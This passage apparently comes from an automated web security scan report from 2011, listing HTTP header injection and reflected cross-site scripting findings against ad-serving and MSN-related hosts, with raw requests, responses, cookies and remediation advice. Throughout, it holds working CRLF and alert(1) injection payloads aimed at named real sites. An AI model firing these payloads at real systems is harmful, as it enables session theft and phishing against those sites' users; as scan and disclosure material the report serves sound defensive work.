GET /adscgen/st.php?survey_num=852149&site=2d2bc%0d%0aa1ed319a68a&code=40142779&randnum=5845715 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0
4.4. http://atl.whitepages.com/accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 7a143%0d%0abd80344d819 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/?7a143%0d%0abd80344d819=1 HTTP/1.1 Host: atl.whitepages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;
Response
HTTP/1.1 302 Moved Temporarily Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86) Date: Sun, 30 Jan 2011 02:06:20 GMT X-DirectServer: whitepg_DS1 Content-Type: text/html Content-Length: 0 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close Location: http://www.peoplefinders.com/redirect.aspx?7a143 bd80344d819=1
4.5. http://atl.whitepages.com/adclick/CID=0000e376b2c762f700000000/relocate=/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://atl.whitepages.com
Path:
/adclick/CID=0000e376b2c762f700000000/relocate=/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 6cd1b%0d%0a5289c0c2c2e was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /adclick/CID=0000e376b2c762f700000000/relocate=/?6cd1b%0d%0a5289c0c2c2e=1 HTTP/1.1 Host: atl.whitepages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;
Response
HTTP/1.1 302 Moved Temporarily Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86) Date: Sun, 30 Jan 2011 02:06:33 GMT X-DirectServer: whitepg_DS3 Content-Type: text/html Content-Length: 0 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close Location: /?6cd1b 5289c0c2c2e=1
4.6. http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate= [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://atl.whitepages.com
Path:
/adclick/CID=0000ed08b2c762f700000000/relocate=
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 89d41%0d%0a8fdda0bf760 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /adclick/CID=0000ed08b2c762f700000000/relocate=?89d41%0d%0a8fdda0bf760=1 HTTP/1.1 Host: atl.whitepages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;
Response
HTTP/1.1 302 Moved Temporarily Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86) Date: Sun, 30 Jan 2011 02:09:42 GMT X-DirectServer: whitepg_DS3 Content-Type: text/html Content-Length: 0 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close Location: ?89d41 8fdda0bf760=1
4.7. http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://atl.whitepages.com
Path:
/adclick/CID=0000ed08b2c762f700000000/relocate=/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 19107%0d%0ab5b4e2d432b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /adclick/CID=0000ed08b2c762f700000000/relocate=/?19107%0d%0ab5b4e2d432b=1 HTTP/1.1 Host: atl.whitepages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;
Response
HTTP/1.1 302 Moved Temporarily Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86) Date: Sun, 30 Jan 2011 02:06:38 GMT X-DirectServer: whitepg_DS5 Content-Type: text/html Content-Length: 0 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close Location: /?19107 b5b4e2d432b=1
The value of REST URL parameter 1 is copied into the Location response header. The payload 8543b%0d%0a8fd8777078a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /bserver8543b%0d%0a8fd8777078a/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1 Host: atl.whitepages.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D
Response
HTTP/1.1 302 Moved Temporarily Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86) Date: Sun, 30 Jan 2011 01:40:45 GMT X-DirectServer: whitepg_DS3 Content-Length: 0 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close Location: /LSERVER/bserver8543b 8fd8777078a/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link
The value of REST URL parameter 2 is copied into the Location response header. The payload 44838%0d%0acf1fcfc8e87 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /bserver/44838%0d%0acf1fcfc8e87/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1 Host: atl.whitepages.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D
Response
HTTP/1.1 302 Moved Temporarily Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86) Date: Sun, 30 Jan 2011 01:40:51 GMT X-DirectServer: whitepg_DS1 Content-Length: 0 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close Location: /LSERVER/bserver/44838 cf1fcfc8e87/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link
The value of REST URL parameter 3 is copied into the Location response header. The payload 91fa6%0d%0ae13b060d036 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /bserver/AAMALL/91fa6%0d%0ae13b060d036=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1 Host: atl.whitepages.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D
Response
HTTP/1.1 302 Moved Temporarily Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86) Date: Sun, 30 Jan 2011 01:40:57 GMT X-DirectServer: whitepg_DS3 Content-Length: 0 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close Location: /LSERVER/bserver/AAMALL/91fa6 e13b060d036=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link
4.11. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 29f59%0d%0a7bcc5cf3004 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link?29f59%0d%0a7bcc5cf3004=1 HTTP/1.1 Host: atl.whitepages.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D
Response
HTTP/1.1 302 Moved Temporarily Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86) Date: Sun, 30 Jan 2011 01:40:40 GMT X-DirectServer: whitepg_DS0 Content-Length: 0 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close Location: /LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link?29f59 7bcc5cf3004=1
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 130f0%0d%0a954906be907 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117809&PluID=0&w=300&h=60&ord=35801428&ifrm=1&ncu=$$http://g.redacted/_2AD0003L/79000000000085282.1?!&&PID=7902678&UIT=G&TargetID=28253485&AN=35801428&PG=INVPC2&ASID=a610568226dd43348f3d9fefa630960e$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0130f0%0d%0a954906be907; A3=f+JvabEk02WG00002h5iUabNA07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The value of the $ request parameter is copied into the Set-Cookie response header. The payload 3ea58%0d%0a723dce477a3 was submitted in the $ parameter. This caused a response containing an injected HTTP header.
The value of the $ request parameter is copied into the Set-Cookie response header. The payload c4bae%0d%0aa72d820a2b6 was submitted in the $ parameter. This caused a response containing an injected HTTP header.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1394:c4bae a72d820a2b6;expires=Sun, 30 Jan 2011 05: 00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe5-82a5-4989a5927aac0" Vary: Accept-Encoding X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=138 Expires: Sun, 30 Jan 2011 01:46:01 GMT Date: Sun, 30 Jan 2011 01:43:43 GMT Connection: close Content-Length: 3384
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat=',c4bae a72d ...[SNIP]...
4.15. http://redacted/home.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://moneycentral.msn.com
Path:
/home.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 4ae1b%0d%0a33d8416c84 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /home.asp?4ae1b%0d%0a33d8416c84=1 HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 30 Jan 2011 02:15:43 GMT Server: Microsoft-IIS/6.0 Location: http://money.redacted//?4ae1b 33d8416c84=1 Content-Length: 74
object moved <a href="http://money.msn.com//?4ae1b 33d8416c84=1">here</a>
4.16. http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://moneycentral.msn.com
Path:
/investor/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 2d5ca%0d%0acb9513cea6b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /investor/home.aspx?2d5ca%0d%0acb9513cea6b=1 HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 29 Jan 2011 23:48:19 GMT Server: Microsoft-IIS/6.0 Location: http://money.redacted/investing?2d5ca cb9513cea6b=1 Content-Length: 83
object moved <a href="http://money.msn.com/investing?2d5ca cb9513cea6b=1">here</a>
5. Cross-site scripting (reflected)previousnext There are 362 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b670c"-alert(1)-"6e98b65d01c was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870b670c"-alert(1)-"6e98b65d01c&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 01:40:00 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5961
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa ...[SNIP]... dn.net/2426847/1-Branding_Film_300x250_V2.jpg"; minV = 6; FWH = ' width="300" height="250" '; url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870b670c"-alert(1)-"6e98b65d01c&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/2 ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b87f"-alert(1)-"c630857e2e5 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=3048269105b87f"-alert(1)-"c630857e2e5&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 01:40:51 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5961
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa ...[SNIP]... 0_V2.jpg"; minV = 6; FWH = ' width="300" height="250" '; url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=3048269105b87f"-alert(1)-"c630857e2e5&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B40142779/40160566/1%3B%3B%7Eokv% ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 601ea"-alert(1)-"ea0886cce92 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5601ea"-alert(1)-"ea0886cce92&destination=;ord=304826910? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 01:41:29 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5959
